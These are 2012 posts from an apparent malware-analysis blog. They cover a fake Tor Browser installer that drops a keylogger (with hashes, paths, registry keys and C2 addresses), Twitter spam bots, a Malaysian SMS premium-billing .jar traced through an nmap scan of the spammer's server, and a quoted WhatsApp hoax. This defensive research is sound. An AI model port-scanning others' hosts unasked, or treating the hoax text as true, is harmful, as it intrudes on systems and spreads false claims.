<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTtdgPFF9iwOzhPGwfmwSjASRzDxLy1_2ofoyvuIp3vuqkNqshC8SrWIzssWJDJVqqJ0_v2xMGAVKHXUV_bPiOfYq6iUqvDxk_k3Ndx8pQxGFquUwtraMJjJPlVEfYzx1SlEPMeuqjpeQM/s1600/fastotolike7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="307" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTtdgPFF9iwOzhPGwfmwSjASRzDxLy1_2ofoyvuIp3vuqkNqshC8SrWIzssWJDJVqqJ0_v2xMGAVKHXUV_bPiOfYq6iUqvDxk_k3Ndx8pQxGFquUwtraMJjJPlVEfYzx1SlEPMeuqjpeQM/s400/fastotolike7.png" width="400" /></a></div>
<br />
<br />
This script is look like responsible to post a spam to the victim user Facebook wall. The post appear to be submit along with picture of random girl dancing on Youtube.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i1.ytimg.com/vi/4kr_LlfqEqo/mqdefault.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i1.ytimg.com/vi/4kr_LlfqEqo/mqdefault.jpg" /></a></div>
<br />
<br />
<br />
<br />Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-2797284762054001698.post-82543689511161739102012-11-29T11:31:00.000+08:002012-11-29T11:31:54.949+08:00Analysis on TOR_Browser malware<span style="font-size: large;"><b>694DD57886B32AD850224A783198D9FE, 10D52767B537B2F9F564481665B029E6, 761EA80A1C0019D6CB606BB646EBE57F</b></span>
<br />
<br />
The sample has been already circulated around few weeks ago. But still found less information about this malware on internet. Thus, I decide to make some quick analysis.<br />
<br />
<span style="font-size: large;"><b>Basic File Information</b></span>
<br />
<blockquote>
Received filename : Tor_Browser.exe<br />
Original Filename : suf70_launch.exe<br />
Executable vendor : Indigo Rose Corp.<br />
File size : 707,793 bytes
</blockquote>
MD5 hash received from report:<br />
<blockquote>
694DD57886B32AD850224A783198D9FE (Installer file 707,793 bytes)
10D52767B537B2F9F564481665B029E6 (Malicous PE file 9,080 bytes)
761EA80A1C0019D6CB606BB646EBE57F (Malicous PE file 74,240 bytes)
</blockquote>
MD5 hash from official website:<br />
<blockquote>
Official installer file is about 22MB size while the sample is only 700kb.
</blockquote>
<br />
<span style="font-size: large;"><b>Summary</b></span>
<br />
<br />
The sample that we received is in PE installer file. Using TOR Project file icon. While in installation wizard, user will notice that there is no EULA appear on the screen:
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlZXJ0-w0cVPnHZWSB8UITPURANZjXTQl9VrQnISePTLqjGa1hNkYL3z9YA67fn_f3sGhjboTEsAHq2tk5s1QBt_gFkIwdx94eTWP7zFGg3kl27Ih7cyQSbOMQFl59WNSCnGJcW-XdpL0/s503/tor_suspicious_EULA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="387" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlZXJ0-w0cVPnHZWSB8UITPURANZjXTQl9VrQnISePTLqjGa1hNkYL3z9YA67fn_f3sGhjboTEsAHq2tk5s1QBt_gFkIwdx94eTWP7zFGg3kl27Ih7cyQSbOMQFl59WNSCnGJcW-XdpL0/s503/tor_suspicious_EULA.png" width="503" /></a></div>
<br />
The installer file is a malware dropper. Upon finished installation, the malware will not execute itself automatically. Thus, it will need user interaction to reboot their PC or run it manually from Start Menu.
<br />
<br />
If user run it from Start Menu, it will run itself from <b>C:\Program Files\Tor Browser\Tor_Browser.exe</b>. This PE file will then run another process from the following location:
<br />
<pre class="brush: shell">C:\Users\<user profile>\AppData\Local\Temp\explorer.exe
</pre>
Then run the <b>%RANDOMNAME%.bat</b> dropped at Windows Temporary folder. This will delete the previous file <b>Tor_Browser.exe</b> after the process has been terminated.
<br />
<br />
The running fake <b>explorer.exe</b> process will doing several malicious activity including keylogger, save keystroke in encrypted form, resolve IP into malware author DNS.
<br />
<br />
The <b>explorer.exe</b> will remain it process in memory.
<br />
<br />
<span style="font-size: large;"><b>Process Activity</b></span>
<br />
<br />
Upon execution of the sample its create the following mutex:
<br />
<pre class="brush: shell">XXXXOOOO</pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZtTbng6fFrwMEmrN08D0e4F9PDWUNz-i0QKveKos6OseOCCz90TS2ZutdbyYBzHFLwZXtZdUEjad1Yk9oO8jiMxHEKWBrGHJo-GqodKgUEu12JFq7so76qiKqQmaf5zuIrly8HpBQoZU/s453/tor_mutex.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="453" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZtTbng6fFrwMEmrN08D0e4F9PDWUNz-i0QKveKos6OseOCCz90TS2ZutdbyYBzHFLwZXtZdUEjad1Yk9oO8jiMxHEKWBrGHJo-GqodKgUEu12JFq7so76qiKqQmaf5zuIrly8HpBQoZU/s453/tor_mutex.png" width="366" /></a></div>
<br />
This will make sure only single process of itself is running.
<br />
<br />
<span style="font-size: large;"><b>File & folder</b></span>
<br />
<br />
Upon installation the following file has been created:
<br />
<pre class="brush: shell">C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tor Browser\
жÔØ Tor Browser.lnk
Tor_Browser.lnk
C:\Users\<user profile&gt>\AppData\Roaming\Help\
CREATELINK.EXE (Legit file use to create a shortcut link)
iexplore.exe
IconCacheBt.DAT (Encrypted fake explorer.exe file)
IconConfig.DAT (Encrypted keylogger configuration)
C:\Program Files\Tor Browser\Tor_Browser.exe
C:\Windows\Tor Browser\uninstall.exe -- Non-malicious file
C:\Users\<user profile>\AppData\Local\Temp\explorer.exe</pre>
<br/>
This malware sample also create a shortcut link as a startup to the following folder:
<br />
<pre class="brush: shell">C:\Users\<userprofile>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</pre>
<br />
The shortcut file will be linked to the following file location:
<br />
<pre class="brush: shell">C:\Users\<userprofile>\AppData\Roaming\Help\iexplore.exe</pre>
<br />
<span style="font-size: large;"><b>Windows Registry</b></span>
<br />
<br />
The malware will create the following registry key:
<br />
<pre class="brush: shell">HKCU\Software\Microsoft\Windows\DbxUpdateBT
"Mark"="ay"</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVyzHwtaJ4jN6iyV8YBzlH1L545DyVZPrFt2G97fUupy0CJlg4SUyN1XxSnjcZTkE3Y-XqjzGJJLHj6Da5KcIVtjNSdKo7lqcydMF5s2-EhSxMZEW9BG-FsjnA2leKaEZwOKcZmxTEeWc/s744/tor_regmark.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVyzHwtaJ4jN6iyV8YBzlH1L545DyVZPrFt2G97fUupy0CJlg4SUyN1XxSnjcZTkE3Y-XqjzGJJLHj6Da5KcIVtjNSdKo7lqcydMF5s2-EhSxMZEW9BG-FsjnA2leKaEZwOKcZmxTEeWc/s400/tor_regmark.png" width="400" /></a></div>
<br />
NOTE: This registry key use to mark the current machine as already infected.
<br />
The malware also read the following registry key:
<br />
<pre class="brush: shell">HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0\</pre>
and try to read the following value "~MHz". This value is storing a current CPU speed.
<br />
<br />
<br />
<span style="font-size: large;"><b>Keylogger Activity</b></span>
<br />
<br />
Save key stroke from user input to the following file:
<br />
<pre class="brush: shell">C:\Users\<user profile>\AppData\Local\Temp\win_32.sys</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghTU8sXI9HvXeG0dc-4LMXWxcjMMWJR1Diy_wUCvmcFhHw9FwgmKSznNgQ7f88Hm-83Y7rS2X01A25myMMNXcKbmP3DeTjI8lVn2WnWxZ0eA3GCYGkdsdSCMrpxbwJoR7ig09GV_XMLn0/s569/tor_keylog1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghTU8sXI9HvXeG0dc-4LMXWxcjMMWJR1Diy_wUCvmcFhHw9FwgmKSznNgQ7f88Hm-83Y7rS2X01A25myMMNXcKbmP3DeTjI8lVn2WnWxZ0eA3GCYGkdsdSCMrpxbwJoR7ig09GV_XMLn0/s400/tor_keylog1.png" width="400" /></a></div>
<br />
All captured key stroke is saved in encrypted form (Using compression library).
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc0YVNO-3d_2TaVZetiIQb_huRcUJVun0e575kQF6BtKCXOghhjWK_2uaI4D4HiYIQ3DLSOy1w8PutK1EOePdqIknc4SFpfAJIiKzk3EyrDf-xMreBbPY_QuU0B2MAwIx1rXlnvM66gHE/s512/tor_winsys_enc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="474" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc0YVNO-3d_2TaVZetiIQb_huRcUJVun0e575kQF6BtKCXOghhjWK_2uaI4D4HiYIQ3DLSOy1w8PutK1EOePdqIknc4SFpfAJIiKzk3EyrDf-xMreBbPY_QuU0B2MAwIx1rXlnvM66gHE/s512/tor_winsys_enc.png" width="512" /></a></div>
<br />
<span style="font-size: large;"><b>Network</b></span>
<br />
<br />
Trying to connect to the following IP:
<br />
<pre class="brush: shell">222.82.13.89:80</pre>
Domain name found on the malware. Trying to resolve IP from the following DNS:
<br />
<pre class="brush: shell"> mychangeip1.ddns.info
mychangeip.ddns.us
</pre>
<br />
<span style="font-size: large;"><b>Miscellaneous</b></span>
<br />
<br />
The malware sample (<b>iexplore.exe</b>) also contain a digital certificate embedded to it while fake <b>explorer.exe</b> does not have any digital certificate.
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSl53BSWiBEMHcFd2q4BAXotfo5ZLMxWXAPTyxWBNs-F34lgT8wfHIyGvlsKMa3JhAUaU7ZrEHSesVwSd7L-Xw7fAc_PhoA_rQgFdfL0YsrZ9izb2agq1yZ1CXFsFsyzHbOGVyEXpD7O8/s640/tor_cert.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSl53BSWiBEMHcFd2q4BAXotfo5ZLMxWXAPTyxWBNs-F34lgT8wfHIyGvlsKMa3JhAUaU7ZrEHSesVwSd7L-Xw7fAc_PhoA_rQgFdfL0YsrZ9izb2agq1yZ1CXFsFsyzHbOGVyEXpD7O8/s400/tor_cert.png" width="400" /></a></div>
<br />
The digital certificate may be stolen and has been revoked.
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-3761833179825000142012-11-26T17:05:00.000+08:002012-11-26T19:09:22.723+08:00Twitter Spam Bot 'Seducing' YouWell, not directly seduce you. It will mentioning your name on twitter first. It's almost a week after receiving several Tweet post that suddenly mentioned my nickname on my Twitter account. It is look suspicious when these person is not even following me. The text message also has nothing to do with my interest.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixzMXXq0jkmEccu_7dMvei09Ktf_NrOjx8FHx9x8CQoFEX8XUhPU-eTWmmK47rbiPv312mi_FXDVoKaTkJnhttu7uEUum9DBbrMVffHcALKa0lgLQfXlxJvAIgjOVSDV6dqgnuuXmmH0c/s1600/twitter_spam2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixzMXXq0jkmEccu_7dMvei09Ktf_NrOjx8FHx9x8CQoFEX8XUhPU-eTWmmK47rbiPv312mi_FXDVoKaTkJnhttu7uEUum9DBbrMVffHcALKa0lgLQfXlxJvAIgjOVSDV6dqgnuuXmmH0c/s400/twitter_spam2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
By the time I wrote this blog post, those spammer still actively tweet and randomly mentioning peoples name. Average sending around 20 tweet post per day.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNu0Oc47L15CKk3GOw8zA7hvWs96ElohfPEHYdHZeW5m1lizy0XdjWTN7SDUykHvBuYpcFIXj2Qh7n7Ln13aXsF4K3cljxxwdZrxxZTcr3yJPQY91aFOip5QvJHnncrpGzM444cz9Y5SU/s1600/twitter_spam.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="345" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNu0Oc47L15CKk3GOw8zA7hvWs96ElohfPEHYdHZeW5m1lizy0XdjWTN7SDUykHvBuYpcFIXj2Qh7n7Ln13aXsF4K3cljxxwdZrxxZTcr3yJPQY91aFOip5QvJHnncrpGzM444cz9Y5SU/s400/twitter_spam.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As I post this screenshot it is not only that name keep randomly mentioning people but there is several others spammer using different name but almost the same message produced by their spam 'bot'. <b>Virus Bulletin</b> guys also send some screenshot regarding this twitter spam activity. <a href="http://twitpic.com/bg0rgm">http://twitpic.com/bg0rgm</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwnCyJUfb_WYRnHBN7-eCZKqQ8nV65uQ9Jbcbaxfc9QjPskypfDJPeVHAgLgg-_IQoDKXlB1FJYlw6znpRG3wh3k2f4jMuETFcH7rChCAUX_6LBK0u9DXA1j63os74UWrHT4eZvXhCY_A/s1600/capribot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="353" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwnCyJUfb_WYRnHBN7-eCZKqQ8nV65uQ9Jbcbaxfc9QjPskypfDJPeVHAgLgg-_IQoDKXlB1FJYlw6znpRG3wh3k2f4jMuETFcH7rChCAUX_6LBK0u9DXA1j63os74UWrHT4eZvXhCY_A/s400/capribot.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Most of spam 'bot' name is starting with prefix '<b>Caprigal</b>xxx' ('x' could be random alphabet & number). But it could be other name also. Those 'random' account name is really exists and always use seduce picture to attract more people following them.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjsBjPIKNrYHD3rMq_xJ1Nhyphenhyphen-z9LJn2fUZgeM0NCwIR7Wks8aUzORpMq8aQ-QpzwFYeReP1LfX5qo1msrYp2UrsIm83cxO96y3aOx7ZRQWOE5JNAwzY-9QHBfUZkWa3mdyEdpOspSbQf8/s1600/twitterspam.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjsBjPIKNrYHD3rMq_xJ1Nhyphenhyphen-z9LJn2fUZgeM0NCwIR7Wks8aUzORpMq8aQ-QpzwFYeReP1LfX5qo1msrYp2UrsIm83cxO96y3aOx7ZRQWOE5JNAwzY-9QHBfUZkWa3mdyEdpOspSbQf8/s400/twitterspam.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Here it is another example screenshot. Most of those spammer account always looks like this.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-38780362283070069752012-09-02T02:04:00.000+08:002012-09-04T10:33:32.422+08:00Investigation behind Malaysian SMS spam with .jar attachment (0195451395).I constantly received SMS spam message with .jar as an attachment. This is happened several times within 3 months. So, I decided to make some digging on who is the person behind this activity.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZNluPkruUAeYaFwJGhLeFM9FvHOHJwIcSh-6CBQt_EaTHAVL1TqJ8uNmAKKrA-fZnA8lcLKGhIg3OzC0djJGX2EoaaEOzO1emPZmwhdhP6ymJkRxWjZFXHoY0i_ZYuPXQjwwMRXV2jVU/s1600/20120901_231157.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZNluPkruUAeYaFwJGhLeFM9FvHOHJwIcSh-6CBQt_EaTHAVL1TqJ8uNmAKKrA-fZnA8lcLKGhIg3OzC0djJGX2EoaaEOzO1emPZmwhdhP6ymJkRxWjZFXHoY0i_ZYuPXQjwwMRXV2jVU/s400/20120901_231157.jpg" width="400" /></a></div>
<br />
The phone number used by the spammer:<br />
+6019-5451395 (Can be several other phone numbers)<br />
<br />
The SMS message contain a URL which is will redirect to another server that provide a download link:<br />
hxxp://bit.ly/RuMmBi ---> hxxp://203.223.148.215/R340.jar<br />
<br />
The .jar file look suspicious and inappropriate way to promote sometime with such attachment. Lets try to access on IP 203.223.148.215 with browser.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEOy8G14c34b2V4jDCNWkzh2xKLGAPKE483k2hLJKUtZstNm0ew3VTyGJuCMWEQrt0lb0iFtEmDncfVkfAhrxqP5MHGaOqeW8OBDM0CczYW5_k5RPjOFYOt3YXF6Glo85onj9s2hP3Es8/s1600/sms-spam1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEOy8G14c34b2V4jDCNWkzh2xKLGAPKE483k2hLJKUtZstNm0ew3VTyGJuCMWEQrt0lb0iFtEmDncfVkfAhrxqP5MHGaOqeW8OBDM0CczYW5_k5RPjOFYOt3YXF6Glo85onj9s2hP3Es8/s400/sms-spam1.png" width="400" /></a></div>
<br />
The IP 203.223.148.215 is resolved to domain name www.smsgateway.cc . Seem like it's running with IIS on Windows machine. Now lets NMAP it.<br />
<br />
<pre class="brush: shell">Host is up (0.011s latency).
Not shown: 979 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
25/tcp filtered smtp
80/tcp open http Microsoft IIS httpd 7.5
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: 403 - Forbidden: Access is denied.
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
593/tcp filtered http-rpc-epmap
1026/tcp filtered LSA-or-nterm
1027/tcp filtered IIS
1433/tcp open ms-sql-s Microsoft SQL Server 2008
2383/tcp open ms-olap4?
3389/tcp open microsoft-rdp Microsoft Terminal Service
4444/tcp filtered krb524
6129/tcp filtered unknown
6667/tcp filtered irc
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servi
t.cgi :
SF-Port1433-TCP:V=5.51%I=7%D=9/1%Time=50421EB0%P=i686-pc-windows-windows%r
SF:(ms-sql-s,25,"\x04\x01\0%\0\0\x01\0\0\0\x15\0\x06\x01\0\x1b\0\x01\x02\0
SF:\x1c\0\x01\x03\0\x1d\0\0\xff\n2\x06@\0\0\0\0");
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista (94%), FreeBSD 6.X (86%)
Aggressive OS guesses: Microsoft Windows Server 2008 SP2 (94%), Microsoft Windows 7 (94%), Microsoft Windows Vista SP0 or SP1, Server 2008 SP1, or Windows 7 (94
oft Windows Server 2008 (94%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows 7 Professional (93%), Microsoft Windows Server 2008 Beta 3 (93%), Micro
ws 7 Ultimate (92%), Microsoft Windows Vista Business SP1 (91%), Microsoft Windows Vista Home Premium SP1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 6 hops
Service Info: OS: Windows
TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 8.00 ms 60.53.173.202
2 5.00 ms 115.132.110.213
3 5.00 ms 115.132.110.213
4 8.00 ms 10.55.36.118
5 12.00 ms ge-0-1.edge-gw-1-kul-sip.my.globaltransit.net (61.11.210.174)
6 11.00 ms 203.223.148.215
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.76 seconds
</pre>
<br />
<br />
Well, the following is the only port that can be accesses by public:
<br />
<pre class="brush: shell">21/tcp Microsoft ftpd
80/tcp Microsoft IIS httpd 7.5
1433/tcp Microsoft SQL Server 2008
2383/tcp ms-olap4?
3389/tcp microsoft-rdp Microsoft Terminal Service
49152/tcp Microsoft Windows RPC
49153/tcp Microsoft Windows RPC
49154/tcp Microsoft Windows RPC
49155/tcp Microsoft Windows RPC
49160/tcp Microsoft Windows RPC
49161/tcp Microsoft Windows RPC
</pre>
<br />
Now we need to take a look on the .jar file. First of all let see how it's look like when running on the phone. In this case I use Nokia Emulator.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSO6TyOGkgYxjHpIic_FhNlFakHjgPaESEZOrLJV_85T04xbyqI1169UTPAvxJqnmY6BWvOfaztrGxOEHmK-VyZ3xoW-3COLd91o6d_LaNoQ7a973userlikDqkGblVeoQXlrZU-kpVxI/s1600/sms-spam3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSO6TyOGkgYxjHpIic_FhNlFakHjgPaESEZOrLJV_85T04xbyqI1169UTPAvxJqnmY6BWvOfaztrGxOEHmK-VyZ3xoW-3COLd91o6d_LaNoQ7a973userlikDqkGblVeoQXlrZU-kpVxI/s640/sms-spam3.png" width="313" /></a></div>
<br />
Once victim user run the spam app it will instantly popup a message to send a message to the 33375 number. If user click/tap on Yes button it will automatically subscribe RM3.00 for another spam data. Your credit will be 'stolen' for RM3.00 monthly.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_NmpC9hHgyQ22GgPl2HZ373ZIjqzYCJvd4Sr_Jyj8Cu9n9v4b-DTde-cucoBA8Kjdek4kiaGF2q0oxF-vJ5C9vPO9K0Ni8gxJUaZasRtTBRu9eLH4db1sW_YzEcTht6Dkn5s_7HY9VdU/s1600/sms-spam6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_NmpC9hHgyQ22GgPl2HZ373ZIjqzYCJvd4Sr_Jyj8Cu9n9v4b-DTde-cucoBA8Kjdek4kiaGF2q0oxF-vJ5C9vPO9K0Ni8gxJUaZasRtTBRu9eLH4db1sW_YzEcTht6Dkn5s_7HY9VdU/s400/sms-spam6.png" width="400" /></a></div>
<br />
As the details SMS traffic shown on the image above. Let's take a look on .jar source code below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0ZLc8qkXoI6C2EU84NELrY6JVXXF7XdYxkq9weGbud__mqb3Zm5whMtnsx0ixosBRyznfWoRM_KZrPTlc3bczSavrJbSZRie8TiYrlC7mAMszn424E3ZT-WX3yxre1MDCm6RQUlaGRD8/s1600/sms-spam4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0ZLc8qkXoI6C2EU84NELrY6JVXXF7XdYxkq9weGbud__mqb3Zm5whMtnsx0ixosBRyznfWoRM_KZrPTlc3bczSavrJbSZRie8TiYrlC7mAMszn424E3ZT-WX3yxre1MDCm6RQUlaGRD8/s400/sms-spam4.png" width="400" /></a></div>
<br />
The variables <i>paramString1 </i>and <i>paramString3 </i>will corresponds to the manisfest file.<br />
<br />
If we take a look on 'c' class on the source code there is another shorten link which is will redirect to their Terms and Conditions web page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB0f_mhmCl5reeSw0yZ2VsUAQpA-IYO6KPlSai183mKHveatD7v8t3BthJ9-ipl1rEYTBi9rGA5PADNQ2jwlTuwYyPRj_PYDO06gltb4O-Ov6zCLbmiRPU5yliR3IDFDAhT9ED4xwJM2g/s1600/sms-spam5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="257" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB0f_mhmCl5reeSw0yZ2VsUAQpA-IYO6KPlSai183mKHveatD7v8t3BthJ9-ipl1rEYTBi9rGA5PADNQ2jwlTuwYyPRj_PYDO06gltb4O-Ov6zCLbmiRPU5yliR3IDFDAhT9ED4xwJM2g/s400/sms-spam5.png" width="400" /></a></div>
<br />
The shortened link will be redirect as the following:<br />
hxxp://bit.ly/Mubvpe ---> hxxp://progain.smsgateway.cc/tnc.html
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMCKU0rd_zlJJMYOzbb4tAwv9eFLX_5J7EY3baWDQFN9mH6GR3DhxkFn0gEhbLg-RoSI3T8asy2EVdHChEIoyzfvCurc5RHd0WeCqahqaEAcbcMIrU4FwJMzv1wMee0iMWmtVwOcvz2_A/s1600/sms-spam7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMCKU0rd_zlJJMYOzbb4tAwv9eFLX_5J7EY3baWDQFN9mH6GR3DhxkFn0gEhbLg-RoSI3T8asy2EVdHChEIoyzfvCurc5RHd0WeCqahqaEAcbcMIrU4FwJMzv1wMee0iMWmtVwOcvz2_A/s400/sms-spam7.png" width="400" /></a></div>
<br />
Based on their TnC, it seem that <b>Million Progain Sdn Bhd (</b><span style="background-color: #f7f7f7; font-family: 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif; font-size: 12px;">916763-X</span><b>)</b> is responsible for receiving payment from the user. Several TnC also has been violated by this company. I'll keep the details about this company because it seem lead to more abusive services.<br />
<br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-3642419151847160302012-08-26T21:01:00.001+08:002012-08-26T21:06:41.613+08:00Whatsapp Hoax Message Still in Circulation<div class="separator" style="clear: both; text-align: justify;">
It seem that a viral message still in circulated around my Whatsapp with hoax content. It has been a few months already since it first appearance on January 2012. Hopefully no more forwarded message like this again.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgck2t6eHmnIzEHFQnUoU5ezZYsrBfXfmSlvJbdxXcPo5jnLNgy6toYQmytNMwolJ9gU4LFNw8I5gv8V_vOUbQNlyfhp7O9kFEn6BgFf0E2h5kmeR31XkiEZtIp9Qis5QQVmrxMeVTZggs/s1600/20120826_204608.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgck2t6eHmnIzEHFQnUoU5ezZYsrBfXfmSlvJbdxXcPo5jnLNgy6toYQmytNMwolJ9gU4LFNw8I5gv8V_vOUbQNlyfhp7O9kFEn6BgFf0E2h5kmeR31XkiEZtIp9Qis5QQVmrxMeVTZggs/s400/20120826_204608.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Full hoax message:</div>
<blockquote class="tr_bq">
Message from Jim Balsamic (CEO of Whatsapp) we have had an over usage of user names on whatsapp Messenger. We are requesting all users to forward this message to their entire contact list. If you do not forward this message, we will take it as your account is invalid and it will be deleted within the next 48 hours. Please DO NOT ignore this message or whatsapp will no longer recognise your activation. If you wish to re-activate your account after it has been deleted, a charge of 25.00 will be added to your monthly bill. We are also aware of the issue involving the pictures updates not showing. We are working diligently at fixing this problem and it will be up and running as soon as possible. Thank you for your cooperation from the Whatsapp team” WhatsApp is going to cost us money soon. The only way that it will stay free is if you are a frequent user i.e. you have at least 10 people you are chatting with. To become a frequent user send this message to 10 people who receive it (2 ticks) and your WhatsApp logo</blockquote>
<div>
<br /></div>
<div>
